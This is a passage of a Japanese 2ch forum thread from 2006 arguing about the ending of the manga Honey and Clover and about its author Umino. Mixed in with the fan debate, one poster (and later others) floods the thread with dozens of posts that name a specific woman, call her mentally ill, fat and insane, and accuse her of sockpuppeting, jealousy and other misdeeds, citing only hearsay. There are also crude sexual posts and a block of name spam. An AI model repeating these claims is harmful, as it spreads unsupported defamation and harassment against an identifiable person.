大槻ケンジとかあの辺の読者もそのへんで白けてしまったことだろうと思う。

87 :花と名無しさん:2006/09/05(火) 09:31:47 ID:???0
森田とのすれ違いには過去の作者経験(或いは怨念)がにじみ出てるね。

才能あるアテクシは誰かの嫁なんかに収まりたくないわよ? 
それってすごいことでしょ? おののきなさい男ども

そう読める

88 :花と名無しさん:2006/09/05(火) 09:33:08 ID:???0
大槻ケンジは羽海野との対談で
羽海野を絶賛するんじゃなくて
社交辞令や礼儀として誉めつつも
どっか皮肉ってるようなニュアンスの発言をしてたよね。

89 :花と名無しさん:2006/09/05(火) 09:35:53 ID:???0
同人の延長のような漫画しか書けない作者が、
自分のことをはぐみとなぞらえて
「ものづくりをしていて、才能があるがゆえに
 まわりから嫉妬されたりして、苦悩する女」
のように思っているらしいのには呆れる。

90 :花と名無しさん:2006/09/05(火) 09:42:58 ID:???0
>>88
皮肉ってるっていうか、そのものズバリの発言だろう。
ハチクロには処女と童貞しかいないのか?みたいな…。
みんなが裸の王様(ウミノ)をちやほやしてる中で
「王様は裸でしょ」と言ってしまうような発言。

91 :花と名無しさん:2006/09/05(火) 09:58:53 ID:???0
>>85
相手が山田だったらまだマシだったかも。
はぐだってところがなぜか異常に背徳感が漂うんだよね。

92 :花と名無しさん:2006/09/05(火) 10:47:42 ID:???0
「自分は『特別な人間』になれるつもりだった平凡な女」が
成功者であるウミノさんを叩いて
ストレス解消してるようにしかみえなくて
このスレ醜い。

2ちゃんではいろんな叩きがあるけど
あんたらのやってることは単なる暇つぶしじゃないか。
心底嫌いなら読まなければいいのに。
他人のことを悪く言う人の姿が美しいはずはなし。
あ、叩いてる人も所詮元ファンが多いから、結局同じか。
叩いてる人はウミノさんのの言動や発想に
叩いてる人自身の痛い部分を投影してるくせに
上から見た反面教師のつもりでいるんだろな。

93 :花と名無しさん:2006/09/05(火) 11:30:04 ID:???0
別にスガシカオやスピッツの影響を受けてラストや話の筋を変えてもいいと思うけど
いろいろなものに影響されて今のハチクロができたんでしょ
パクリじゃあるまいし…
>>92同意

94 :花と名無しさん:2006/09/05(火) 11:56:12 ID:???0
私はこんなに叩かれるほどに、ハチクロの中身やウミノさんの発言が
人のコンプレックスとか、痛覚を刺激するものだったことに驚いてる。
全部読んで、スレがこうなるとは思わなかった。

95 :花と名無しさん:2006/09/05(火) 11:59:46 ID:???0
>92
> 「自分は『特別な人間』になれるつもりだった平凡な女」が
成功者であるウミノさんを叩いて

ワロタw

96 :花と名無しさん:2006/09/05(火) 12:08:36 ID:9tlB2mTtO
叩いてる女の名前は高橋佳子

97 :花と名無しさん:2006/09/05(火) 12:11:25 ID:???0
そういえば
いくえみ稜が
「自分の作品について解説はしない。出したものがすべてだから」
と言っていてかっこいいと思ったな……

98 :花と名無しさん:2006/09/05(火) 12:20:05 ID:???0
>>92
同意
このスレ醜い

99 :花と名無しさん:2006/09/05(火) 12:22:06 ID:9tlB2mTtO
高橋佳子は醜い

100 :花と名無しさん:2006/09/05(火) 12:24:42 ID:???0
>>97
そういうのを明言するのも、かっこつけてんなーと思うw
言わなくていいことだよ。

101 :花と名無しさん:2006/09/05(火) 12:31:28 ID:9tlB2mTtO
高橋佳子は美大ものの漫画でデビューするはずだった
けどハチクロが人気になたんでダメになったらしい
それで逆恨みして叩いてる

102 :花と名無しさん:2006/09/05(火) 12:38:02 ID:???0
作品に不満があるのではなく嫉妬で叩いてたのか
それは酷いな

103 :花と名無しさん:2006/09/05(火) 12:43:16 ID:???0
作者が喋りすぎなのがいけないんだよw

賢き者はだまってる、と

104 :花と名無しさん:2006/09/05(火) 12:44:28 ID:???0
>>100
取材で作品について聞かれて答えただけじゃないか?たぶん。
他にも自分の作品について言葉少ない作家さんは結構いるよね。
少なかろうが多かろうが作者の言葉を、ファンは後生大事にして想像を働かせるわけだから
軽口は叩けないし、何年後かに自分の考えが変わったときいいわけできないし
誤解されることが多いんだと思う。
あくまで漫画で世に出てるわけだから、
何も言わず作品を見てください、ってのが正しい姿なんだけど、
売れるとそうもいかないのが辛いところなんだろう。



105 :花と名無しさん:2006/09/05(火) 12:46:45 ID:???0
ウミノさんがんばれ

106 :花と名無しさん:2006/09/05(火) 12:48:05 ID:???0
>>92
アホか。特別な人間がそんなにいいことなのか?
擁護してる方だろう、ウミノと同じ気分になっていたがってるのは。
みんなもう普通であることの尊さを知ってるんだよ。

107 :花と名無しさん:2006/09/05(火) 12:51:34 ID:???0
お笑い芸人が、オレ本当は真面目な才能もあるんですと
本当にやりたかったのはお笑いじゃなくてこっちとか言って
ドキュメンタリーでシリアス顔して嫌われる展開。

鶴太郎みたい

108 :花と名無しさん:2006/09/05(火) 12:55:20 ID:???0
ミーハーなところといい
ウミノさんが一番平凡な人のような気がする

109 :花と名無しさん:2006/09/05(火) 12:55:34 ID:9tlB2mTtO
コーラス編集部様
基地害高橋佳子に気をつけてください

110 :花と名無しさん:2006/09/05(火) 13:03:30 ID:???0
平凡というよりバカ

111 :花と名無しさん:2006/09/05(火) 13:08:39 ID:9tlB2mTtO
海野さんを叩いてるのは全部高橋佳子の自作自演

112 :花と名無しさん:2006/09/05(火) 13:20:22 ID:???0
そう思いたいのは本人と……

113 :花と名無しさん:2006/09/05(火) 13:41:07 ID:9tlB2mTtO
高橋佳子は精神病のデブ

114 :花と名無しさん:2006/09/05(火) 13:42:31 ID:PtB0ueXg0
高橋佳子て誰ですか?



115 :花と名無しさん:2006/09/05(火) 13:53:08 ID:???0
>>106
>みんなもう普通であることの尊さを知ってるんだよ。

普通に尊いもクソねーよw普通の奴なんてそのへんにいくらでもいる。
才能あってそいつにしかできない事して金稼いでる方が尊ばれるに決まってんだろ。


106は平凡って図星つかれてわけわからん事口走ってるし、この漫画読んで
特別かそうじゃないかって部分で嫌になる奴はやっぱりいるんだな。
気持ちはわからなくもないけど、でもおれも>>92に同意。

116 :花と名無しさん:2006/09/05(火) 14:03:28 ID:???0
>>92
同意

117 :花と名無しさん:2006/09/05(火) 14:04:22 ID:???0
>>92
同意です

118 :花と名無しさん:2006/09/05(火) 14:04:37 ID:???O
凡庸なバカが必死

119 :花と名無しさん:2006/09/05(火) 14:06:46 ID:???0
まともに作品について言及している書き込みの
この少なさ…

120 :花と名無しさん:2006/09/05(火) 14:11:54 ID:???0
>>24>>30ぐらいじゃない?w>まともに作品について言及している書き込み

121 :花と名無しさん:2006/09/05(火) 14:16:11 ID:???0
45 :ひよこ名無しさん :2006/06/10(土) 01:03:08 0
竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑
竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑
竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑
竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑
竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑
竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑
竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑
竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑
竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑
竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑
竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑
竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑竹石圭佑


122 :花と名無しさん:2006/09/05(火) 14:20:33 ID:9tlB2mTtO
高橋佳子は作家が自分をモデルに小説書いてくれたとか言ってる基地害

123 :花と名無しさん:2006/09/05(火) 14:23:09 ID:???0
そうだね、作品の話をしようよ。

私はラストに大泣きしました。竹本くんの泣き顔が痛いくらい胸に刺さりました。
海野さんまたコーラスで連載して欲しいです。


124 :花と名無しさん:2006/09/05(火) 14:28:55 ID:???0
私も好きですあのラスト。
ウミノさんは泣けるラストをよく研究しているなぁ。

125 :花と名無しさん:2006/09/05(火) 14:33:28 ID:???O
一人で何回書き込んでんだ
本人か

126 :花と名無しさん:2006/09/05(火) 14:41:06 ID:???0
思い人(=はぐ)に長年尽くし続け、結果中途半端に振られたあげく
恋敵(=修)への想いをなんの気まずさもなく相談されてしまう哀れな竹本・・・・


127 :花と名無しさん:2006/09/05(火) 14:41:19 ID:hjdiOMRE0
おれが竹本なら、一人ではぐの部屋に泊まった時に
絶対おっぱい触ったりしながらシコシコするけどな。
そのへんのリアリティはウミノさん無いよね。

128 :花と名無しさん:2006/09/05(火) 14:50:10 ID:9tlB2mTtO
高橋佳子は河村隆一とテレパシーでつながってて仲村うさぎと共著とか妄想してる
サイト発見して基地害でびっくりした
海野叩きは全部高橋佳子の仕業

129 :花と名無しさん:2006/09/05(火) 14:52:20 ID:9tlB2mTtO
高橋佳子は海野のマネして海好きやってる

130 :花と名無しさん:2006/09/05(火) 14:56:21 ID:9tlB2mTtO
高橋佳子はそのうち犯罪お越しそうで怖い

131 :花と名無しさん:2006/09/05(火) 14:59:27 ID:???0
携帯とPC使い分けてるんだね・・・

132 :花と名無しさん:2006/09/05(火) 15:00:59 ID:9tlB2mTtO
高橋佳子は糞日記自費出版して売れないで基地害になった

133 :花と名無しさん:2006/09/05(火) 15:01:31 ID:???O
>>92
きんもー★
アテクシの大好きな8黒やウミノ☆彡先生に文句言うんじゃないわよ!
の次はやっぱり女の嫉妬乙ですか?
嫌いなら読むなってのはおかど違いだし、
叩きや批判するなってのもおかど違いだよ。一度世に出た作品なんだから。
特に作者の言動が疑問を生んでいるのは事実なんだし。
こういう奴って2にいながら住人を下に見てるんだろうな


>>98自演乙

134 :花と名無しさん:2006/09/05(火) 15:02:31 ID:9tlB2mTtO
高橋佳子は精神病

135 :花と名無しさん:2006/09/05(火) 15:03:46 ID:9tlB2mTtO
高橋佳子自演するな!

136 :花と名無しさん:2006/09/05(火) 15:04:15 ID:???O
なんか気持ち悪い儲が湧いてるwww

>>123-124
雑草サンドイッチ食べたいんですか
何で研究してるって分かるんだw

137 :花と名無しさん:2006/09/05(火) 15:10:36 ID:9tlB2mTtO
高橋佳子はプロになれない落ちこぼれ
才能のある人を妬みまくり

138 :花と名無しさん:2006/09/05(火) 15:14:53 ID:9tlB2mTtO
高橋佳子の本は絶版

139 :花と名無しさん:2006/09/05(火) 15:26:40 ID:PtB0ueXg0
真山とリカて
週何日くらいで
エチしてるのかしらん。

140 :花と名無しさん:2006/09/05(火) 15:37:44 ID:???0
儲でもいいじゃん。
儲だからここにいるんであって…
私はすごくいいラストだと思ったよ。
ウミノさんは将棋漫画でも内面をすごく細かく描ききってくれると思う。

141 :花と名無しさん:2006/09/05(火) 15:38:06 ID:9tlB2mTtO
高橋佳子は出会い系マニア

142 :花と名無しさん:2006/09/05(火) 15:38:53 ID:???0
>>92、コピペ改変じゃん…。
http://www.google.com/search?num=50&hl=ja&ie=Shift_JIS&c2coff=1&q=%8C%B3%83t%83@%83%93%82%AA%91%BD%82%A2%82%A9%82%E7%81A%8C%8B%8B%C7%93%AF%82%B6&lr=lang_ja

143 :花と名無しさん:2006/09/05(火) 15:40:44 ID:9tlB2mTtO
高橋佳子漫画家になれなかったから自費出版した痛い奴
だけど絶版絶版絶版

144 :花と名無しさん:2006/09/05(火) 15:45:08 ID:9tlB2mTtO
高橋佳子は河村隆一ヲタ
ライブでキモいと言われてんのに行く
迷惑極みない

145 :花と名無しさん:2006/09/05(火) 15:51:41 ID:9tlB2mTtO
高橋佳子は出版社出入り禁止
永遠にプロになれない
だから叩きまくり

146 :花と名無しさん:2006/09/05(火) 15:52:29 ID:???0
10巻は読みきり『空の小鳥』も収録されるみたいだね。
未読なので楽しみだなー。
星のオペラはすごくいいんだけど
いっしょに掲載されてるマンガがトラウマになりそうなのが
多くて持ってるのがつらい…

147 :花と名無しさん:2006/09/05(火) 15:53:05 ID:9tlB2mTtO
高橋佳子はハチクロのせいでプロデビューを逃した
それでやけになって自費出版して基地害になって絶版

148 :花と名無しさん:2006/09/05(火) 15:56:11 ID:9tlB2mTtO
高橋佳子は勘違いババア

149 :花と名無しさん:2006/09/05(火) 15:58:33 ID:hjdiOMRE0
高橋佳子は火を怖がるサイのモノマネが得意

150 :花と名無しさん:2006/09/05(火) 16:05:52 ID:???O
>>140
開き直ったwww

151 :花と名無しさん:2006/09/05(火) 16:07:28 ID:???O
>>140
ファン通り越して
何でもマンセーするのが
痛々しいから儲って言われるんだよ

152 :花と名無しさん:2006/09/05(火) 16:19:42 ID:???0
うん。信者はキモイ
作者と信者のために全部の読者が我慢しなきゃならんって何処のオウムだ

153 :花と名無しさん:2006/09/05(火) 16:24:38 ID:g1BWdYTw0
プロの世界でも、他の作家とネタがかぶると、
案がボツになるのはよくあるから、ネタでデビュー逃したって
ホントに実力があれば、デビューくらい出来るはず。

ところで、マジ高橋って誰?

154 :船戸美香:2006/09/05(火) 16:28:22 ID:???0
ぬるぽ

155 :花と名無しさん:2006/09/05(火) 16:29:43 ID:???O
ガッ

156 :花と名無しさん:2006/09/05(火) 16:31:52 ID:???O
>>140
内面描写じゃなくて陶酔ポエムね。

157 :花と名無しさん:2006/09/05(火) 16:37:54 ID:MyMuhANS0
九巻まで読んでまだ竹本好きなんだけどそんなどん底あったっけか

158 :花と名無しさん:2006/09/05(火) 16:39:13 ID:???O
sageろよ

159 :花と名無しさん:2006/09/05(火) 16:48:22 ID:???0
>>153
高橋佳子でググれば?

160 :花と名無しさん:2006/09/05(火) 16:48:42 ID:???0
ホント腐って落ちちゃったね

161 :花と名無しさん:2006/09/05(火) 18:10:42 ID:???O
10巻買いますか?

162 :船戸美香:2006/09/05(火) 18:17:15 ID:???0
真山くんにこすってほしいのぉぉぉおおおおおぉおぉおおぉおおおお





163 :花と名無しさん:2006/09/05(火) 18:50:39 ID:???0
なんだこのスレ(´・ω・`)

164 :花と名無しさん:2006/09/05(火) 21:12:25 ID:???0
アンチもマンセーもいていいじゃん。
釣り釣られ合っていけば良いじゃん。

165 : ◆E6wyrLUoXk :2006/09/05(火) 21:57:09 ID:???O
山田さんに尾てい骨に爪をギーッッと立てられたい

166 :花と名無しさん:2006/09/05(火) 22:33:02 ID:???0
はぐの決着には満足
自分勝手な森田がどうしても好きになれなかったから
もしくっ付いたとしてもすぐ駄目になりそうだし


167 :花と名無しさん:2006/09/05(火) 22:40:38 ID:???O
やっぱ ちょっと異常だな このスレ
ついに関係ない人間の悪口まで書いてるし


168 :花と名無しさん:2006/09/05(火) 22:47:57 ID:???0
ヲタが人身御供を出したんでそ



169 :花と名無しさん:2006/09/05(火) 22:50:01 ID:???0
はぐは誰にくっつくかより自分の足で立つことを先に考えて欲しかった

170 :花と名無しさん:2006/09/05(火) 23:11:42 ID:???O
あのままの二人じゃくっつくのが考えられん
はぐも幼く描きすぎだし

>>167みたいな自分は関係ないことを気取る奴の方が異常

171 :花と名無しさん:2006/09/05(火) 23:11:48 ID:???0
パラサイト・ハグの名は伊達じゃない

172 :花と名無しさん:2006/09/05(火) 23:22:23 ID:???O
>>170
は?実際関係ないし
なに言ってんの?
中傷してる本人w?

173 :花と名無しさん:2006/09/05(火) 23:29:56 ID:???O
>>172
冷静な第三者(笑)
ここの異常な奴らと違う俺様(笑)
じゃあなんでこんな異常なスレにいるんだか

174 :花と名無しさん:2006/09/05(火) 23:31:52 ID:???O
>>173
わざわざ男主張して腐女子叩きするのと同類だからほっとけ

175 :花と名無しさん:2006/09/06(水) 00:13:55 ID:jRgSs7hbO
じゃあ異常なやつは アンチスレに書けばいいのに。わざわざ信者がいるスレに書いて
そりゃあ気分悪くするさw
わざわざここに書くなんて なんてゆうか、ちょっと哀れな感じする
好きだった作品に裏切られたんだろ?
とゆうわけで

ハチミツとクローバー アンチスレ
ttp://anime.2ch.net/test/read.cgi/anime/1113499001/

負け組が集まるスレへどうぞ〜w

176 :花と名無しさん:2006/09/06(水) 00:16:02 ID:???0
異常=信者

177 :花と名無しさん:2006/09/06(水) 00:30:12 ID:???0
タモリは、はぐにもう描かなくていい生きてるだけでいいって言ったからフラれたけど
一緒に戦っていく行く道を選んでたなら勝ってたな

178 :花と名無しさん:2006/09/06(水) 00:39:05 ID:???0
そういう行動を取らせたのも全部創造神ウミノだけどな

179 :花と名無しさん:2006/09/06(水) 00:41:44 ID:???0
新世界の神となる

180 :花と名無しさん:2006/09/06(水) 00:56:16 ID:???0
>>175
おっ、流石信者だね。勝ち負けにこだわる辺りw
おかしな二極論で自家中毒起こすタイプか?w

181 :花と名無しさん:2006/09/06(水) 01:48:35 ID:???0
>>177
クリエイター同士が一緒になってうまくいくわけないじゃん。
すくなくともはぐが求める一緒に戦ってくれる人にはなれない。

でも修は違うな。あれははぐにとって互いに傷をなめあうだけの存在だ。

182 :花と名無しさん:2006/09/06(水) 01:57:24 ID:???0
なんでクリエイター同士でうまくいくわけないの?

183 :花と名無しさん:2006/09/06(水) 01:59:25 ID:???0
>>181
じゃあ残りは竹本君?

184 :花と名無しさん:2006/09/06(水) 03:03:57 ID:???O
はぐと森田は良きライバルとして見てた部分もあったから
描かなくていいと言われることは望んでなかったんじゃないかな。
でも森田ははぐのメンタル面やらなんやらの面倒を見る役は向いてなさそうだし……

>>175
結局何が言いたいわけ?
ウミノ先生が馬鹿にされたのがそんなに嫌だった?
アンチを負け組認定や異常な奴扱いするのはどうかと。
しかもそこアニメスレだし

185 :花と名無しさん:2006/09/06(水) 05:21:41 ID:???0
竹本ってなんか仲間の中で一人だけ雰囲気が違うよね。
なんで仲良くなったんだろう

186 :花と名無しさん:2006/09/06(水) 07:28:42 ID:???0
天才秀才集団の中で唯一の凡才だしな。
あのグループにいたこと自体が不幸だったのかもしれん。

だからと言って、
あそこまで壊れる事はなかったと思うがw

187 :花と名無しさん:2006/09/06(水) 07:49:24 ID:jRgSs7hbO
>>184
いや 別に作者の事は どうでもいいし

188 :花と名無しさん:2006/09/06(水) 08:12:59 ID:???0
( ・∀・)<ああそうさ負け犬さ

189 :花と名無しさん:2006/09/06(水) 08:15:32 ID:???O
個々のエピソード・雰囲気と絵柄はいいけれど、ストーリー構成力が…

同人漫画の特徴なんですが

190 :花と名無しさん:2006/09/06(水) 08:20:29 ID:???0
描きたいとこだけ想像してそのまま繋ぎ合わせた感じ

でも海野さんって、すごく想像、妄想力豊かだと思う(悪い意味じゃなく)
絵付きの短編詩集みたいなの出したらカワイイし売れそう

191 : ◆E6wyrLUoXk :2006/09/06(水) 08:23:22 ID:???O
>>169
子ども教室の時にはその片鱗が見えて
このままはぐちゃんも成長していきそうだったのにね

192 :花と名無しさん:2006/09/06(水) 08:25:30 ID:???O
初期が面白いのは当り前なんだよ

風呂敷は広げるのより畳む方が遥かに難しい

193 :花と名無しさん:2006/09/06(水) 10:02:02 ID:???0
広げすぎた大風呂敷が
大変なことになっちゃってるもんだってばよ!


まぁウミノは広げた風呂敷がフライングカーペットのまま旅立ってしまったわけだが。

194 :花と名無しさん:2006/09/06(水) 10:09:50 ID:???0
旅立ってないでしょ
地中にめり込んでしまったよ

195 :花と名無しさん:2006/09/06(水) 10:30:37 ID:???0
恋もマトモにできないような女にこれからの時代マトモな芸術できるのか?
オタクなことしかできないのと違うのか?

196 :花と名無しさん:2006/09/06(水) 11:35:24 ID:???0
マトモな芸術って何よ(プ

197 :花と名無しさん:2006/09/06(水) 11:39:06 ID:???0
ハチクロはいろんな大切な言葉を教えてくれる
ウミノさんは本当に感受性ゆたかな方だよね

198 :花と名無しさん:2006/09/06(水) 11:56:18 ID:???0
はぐ(プ

199 :花と名無しさん:2006/09/06(水) 12:31:56 ID:5Dl413kOO
高橋佳子は感受性がないからプロになれないのに嫉妬して叩く基地害
あんなのがなれるなら誰でもなれる

200 :花と名無しさん:2006/09/06(水) 12:38:18 ID:5Dl413kOO
高橋佳子は基地害だから気をつけろ
ドラマまるぱくした漫画書いてパクってないという精神病患者

201 :花と名無しさん:2006/09/06(水) 12:42:48 ID:5Dl413kOO
高橋佳子は自作自演しまくりのデブス

202 :花と名無しさん:2006/09/06(水) 12:44:12 ID:5Dl413kOO
高橋佳子は編集部に自分の漫画を載せろと乗り込む基地害

203 :花と名無しさん:2006/09/06(水) 12:47:14 ID:5Dl413kOO
コーラス編集部の皆さん。見ていたら高橋佳子に気をつけてください
30過ぎのババアなのに親が一緒じゃないと外出できない危険人物です

204 :花と名無しさん:2006/09/06(水) 14:40:22 ID:aEuG/ZFA0
ググったが誰だかちっとも分からない。宗教の方すか?
一体どこで、ウミノさんの叩きをしたのだ?

205 :花と名無しさん:2006/09/06(水) 14:50:41 ID:???0
http://www.bleach-movie.com/

206 :花と名無しさん:2006/09/06(水) 15:11:21 ID:???O
狂ってるな
ヤバいよ

207 :花と名無しさん:2006/09/06(水) 15:22:47 ID:???0
ウミノの本名じゃね?

208 :花と名無しさん:2006/09/06(水) 15:23:38 ID:???O
>>205茶髪の女キャラ、山田に似てるね。

209 :花と名無しさん:2006/09/06(水) 15:23:56 ID:???0
いや、誰か関係者の本名を呪っているとすれば
5Dl413kOOこそがウミノさんということ…

210 :花と名無しさん:2006/09/06(水) 15:25:37 ID:???O
ウミノさんmixiしてたの?
知らなかった…。
探しても見つからない。

211 :花と名無しさん:2006/09/06(水) 18:29:57 ID:???0
>>210
友達に見せてもらったんじゃないの?
どうでもいいけどね。

212 :花と名無しさん:2006/09/06(水) 21:01:17 ID:???0
とりあえずウミノさんの本名は高橋佳子じゃないす。
結婚してるか知らんが下の名前も違う

友達…同人時代は泣いて帰るほどいなくなんてなかったよ
逆にイベントではいつも売り子さんにやらせて
自分はワイワイ友達と話したり買いに行ってた印象が…

213 :花と名無しさん:2006/09/06(水) 21:20:45 ID:???0
http://dir.yahoo.co.jp/talent/16/f05-0170.html

214 :花と名無しさん:2006/09/06(水) 21:49:01 ID:???0
>>212
ああ、そうなんだ。
そういうことは知る機会がなかったので、読者的には
本人がインタビューで書いていることを信じるしかないわけなんだけど
アンチというわけじゃないんだけど
それが正しいのだとしたら、あのインタビューはその時代の友人達に失礼だね

215 :花と名無しさん:2006/09/06(水) 21:55:46 ID:???O
ナルトの合同本(がゆんも参加)に参加しといてアレはねぇ…

216 :花と名無しさん:2006/09/06(水) 22:01:58 ID:???0
いやだから、
相手はともかく、
ウミノは友達と認識してなかったんだろう。
そうとでも考えないと、
あんな事は書けないだろう。

217 :花と名無しさん:2006/09/06(水) 22:02:24 ID:???0
すごい深読みだけど同人時代のお友達
(顔見知り程度もしくはウミノさんは顔も名前も覚えていない位の人物)から
ハチクロヒットで急に連絡が来たりなんてしてるのかもしれない。
宝くじで大金当たったら普段連絡もない・知らない親戚からいきなり
電話なんかが来たりするのと一緒で
それでウミノさんが困った挙句にその人達を遠ざける意味でインタビューであんな言い方したのでは。
本当の友達なら今でも連絡取り合ってるだろうし
友達には了承得てあの発言をしてる可能性もある。
深読みしすぎだと思うが。


218 :花と名無しさん:2006/09/06(水) 22:09:37 ID:???0
人間関係に無神経な人だから・・・

219 :花と名無しさん:2006/09/06(水) 23:12:29 ID:???O
すごいな
ついに作者の人間関係の事まで話始めたか
好きなんだな 近所のおばさんみたいだなお前ら

220 :花と名無しさん:2006/09/06(水) 23:20:29 ID:???0
痛い人には痛い人が群がるのです。

221 :花と名無しさん:2006/09/06(水) 23:23:46 ID:???0
>>219
人間関係はインタビューで本人が良く答えてるんだから仕方あるまい。
本人を前にして初めて「あの時はこう思ってたけどいえなくて…」なんてことを
インタビューの時にやるような人なんだから。

222 :花と名無しさん:2006/09/06(水) 23:24:50 ID:???0
ちょっと急展開な感じだけど、いい感じに終わったね。
前のスレだと竹本が腐ったとか修氏ねとか
ボロクソ書かれてたけど、コレなら納得するのかな?

山田と野宮はありだと思うし最後は竹本・はぐで締めたのも
俺はいいと思う。でも、森田の将来は映画監督? コレは・・・ありかw

223 :花と名無しさん:2006/09/06(水) 23:28:19 ID:???0
俺…

224 :花と名無しさん:2006/09/06(水) 23:31:50 ID:???0
最終回は、はぐ怪我からどれくらいたってるの?

225 :花と名無しさん:2006/09/06(水) 23:40:48 ID:???0
しらん

226 :花と名無しさん:2006/09/06(水) 23:43:59 ID:???0
浜美祭が11月で最終回が卒業(恐らく3月)後だから4ヶ月は経ってるんじゃない?

227 :花と名無しさん:2006/09/06(水) 23:49:28 ID:???0
4ヶ月であんなに治るんだね。
そんなもんなのかな。

228 :花と名無しさん:2006/09/07(木) 00:03:29 ID:???0
そんなもんだよ

229 :花と名無しさん:2006/09/07(木) 00:11:20 ID:???O
>>219
大好きなウミノ先生の現実を認めたくないみたいですね

230 :花と名無しさん:2006/09/07(木) 00:12:31 ID:???O
>>219
だからってここの女のせいにする方がきんもー★

231 :花と名無しさん:2006/09/07(木) 00:40:43 ID:???0
ウミノさんが画力&表現力があって人気があるのが面白くない人がいるようだね


232 :花と名無しさん:2006/09/07(木) 00:47:51 ID:???0
何か新規さん多いのか、と思ったらコミックスが金曜発売だからかな。
既に一部で早売りしてたりするのかな?

233 :花と名無しさん:2006/09/07(木) 00:52:27 ID:ZyDalG0pO
231
高橋佳子だよ
急にこのスレにアンチが増えたのは高橋佳子の自作自演

234 :花と名無しさん:2006/09/07(木) 01:10:23 ID:ZyDalG0pO
高橋佳子はさくらももこやクレヨンしんちゃんの人より絵がへたでスクリーントーンも貼れない
なのにプロ気取りでリボン編集部に持ち込む基地害

235 :花と名無しさん:2006/09/07(木) 01:12:58 ID:???O
>>231
画力ねぇ…

236 :花と名無しさん:2006/09/07(木) 01:16:32 ID:???O
>>231
今度は嫉妬認定か
儲の被害妄想は凄まじいな

237 :花と名無しさん:2006/09/07(木) 01:16:49 ID:???O
テンプレの修って花元修司の事ですか?

238 :花と名無しさん:2006/09/07(木) 01:17:14 ID:???0
ダヴィンチインタが痛かった
この漫画はシカオさんの曲がベースなんです!ってアピールしまくり
ただのシカオ好きとシカオの対談だった

239 :花と名無しさん:2006/09/07(木) 01:20:57 ID:???0
ウミノさんのことじゃなくて作品の話をしろよ
そういうところが嫉妬がバリバリ出てるんだよ

240 :花と名無しさん:2006/09/07(木) 01:24:20 ID:???0
>>236 あんたも凄まじいな。
妄想って、計り知れないよ。

241 :花と名無しさん:2006/09/07(木) 01:24:42 ID:???0
漫画よりウミノたん本人の方が目立ってるから話題になりやすいんでないの

242 :花と名無しさん:2006/09/07(木) 01:29:06 ID:ZyDalG0pO
海野を叩いてるのは高橋佳子の自作自演

243 :花と名無しさん:2006/09/07(木) 01:31:50 ID:ZyDalG0pO
高橋佳子は自分の漫画をアニメ化して河村隆一の曲を搬入歌にしたいらしい
それで海野さんに嫉妬

244 :花と名無しさん:2006/09/07(木) 01:49:58 ID:???0
知らん女を連呼されてもワカランて

245 :花と名無しさん:2006/09/07(木) 01:53:30 ID:ZyDalG0pO
高橋佳子
ハチクロ人気のせいで美大もので漫画家デビューがおばんになって海野さんに嫉妬
デブスの三十路越えババア
自分をプロの漫画家だと妄想
自作自演ばかりしてる基地害
河村隆一とテレパシーでつながってると妄想
中村うさぎと共著すると妄想
小説家が自分をモデルに小説を書いてくれたと妄想

246 :花と名無しさん:2006/09/07(木) 01:55:06 ID:ZyDalG0pO
危険人物だから知らせてるんです
知っていたほうが安全ですから

247 :花と名無しさん:2006/09/07(木) 01:58:40 ID:ZyDalG0pO
高橋佳子はジャニーズのファンサイトを荒らしていたりする基地害
河村隆一公式サイトで自分の本を宣伝する基地害

248 :花と名無しさん:2006/09/07(木) 01:59:37 ID:ZyDalG0pO
高橋佳子は無名なのに有名と思い込む基地害

249 :花と名無しさん:2006/09/07(木) 02:01:56 ID:ZyDalG0pO
高橋佳子は基地害
個人サイトやプログを荒らす基地害

250 :花と名無しさん:2006/09/07(木) 02:04:10 ID:ZyDalG0pO
高橋佳子はドリーム小説のシステムを自分が発明したと思い込む基地害

251 :花と名無しさん:2006/09/07(木) 02:07:03 ID:ZyDalG0pO
高橋佳子は美大ものの漫画でデビューするはずだったがハチクロ人気でおばんになった
それで海野さんを叩いてる
デビュー話は妄想かもしれないが

252 :花と名無しさん:2006/09/07(木) 02:09:37 ID:ZyDalG0pO
高橋佳子は他に渚水帆、望月小夜、青蛙、鳴沢りほという名前を使用
都合が悪いと知らないふりをする基地害

253 :花と名無しさん:2006/09/07(木) 02:26:32 ID:???0
通報します

254 :花と名無しさん:2006/09/07(木) 02:28:46 ID:ZyDalG0pO
嘘じゃないですよ
友達から聞いたんだから

255 :花と名無しさん:2006/09/07(木) 03:51:42 ID:???0
粘着基地外が定住するようになったか。

通報だな。

256 : ◆E6wyrLUoXk :2006/09/07(木) 04:05:04 ID:???O
PRIDEのチケット取れたので山田さんに渡しながら
「待ち合わせ昼ぐらい?」と言ったら「ごめんなさい」
と拒否られたので、家に帰って泣きながらシコった
チケットにかけた

257 :花と名無しさん:2006/09/07(木) 04:20:05 ID:???0
基地外がしつこく書いてる名前を検索したら宗教の人が出たんだが・・・

258 :花と名無しさん:2006/09/07(木) 07:13:39 ID:???0
初めてハチクロを眼にした時、繊細で可愛らしい絵柄に心を奪われました。
日溜りのような温かさと共に混在する、甘酸っぱい寂しさを感じ
私はハチクロに夢中になりました。

でも、いずれ夢は覚める時が来るようです。
やがて時が経ち、冷静にハチクロが読めるようになると
夢中になっていた時には感じなかった事を感じるようになりました。
確かにキャラは動いているけれども、動いていない話。
大袈裟に言うと話が全く進んでいません。

それでも絵柄とキャラには今も魅力を感じるので
